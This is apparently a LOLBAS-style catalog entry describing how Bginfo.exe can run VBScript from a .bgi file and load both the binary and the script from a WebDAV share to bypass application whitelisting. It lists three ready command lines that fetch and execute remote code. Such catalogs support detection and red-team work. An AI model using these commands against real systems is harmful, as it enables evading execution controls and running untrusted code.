--- Name: Bginfo.exe Description: Execute Author: '' Created: '2018-05-25' Categories: [] Commands: - Command: bginfo.exe bginfo.bgi /popup /nolicprompt Description: Execute VBscript code that is referenced within the bginfo.bgi file. - Command: '"\\\webdav\bginfo.exe" bginfo.bgi /popup /nolicprompt' Description: Execute bginfo.exe from a WebDAV server. - Command: '"\\live.sysinternals.com\Tools\bginfo.exe" \\\webdav\bginfo.bgi /popup /nolicprompt' Description: This style of execution may not longer work due to patch. Full Path: - No fixed path Code Sample: [] Detection: [] Resources: - https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/ Notes: Thanks to Oddvar Moe - @oddvarmoe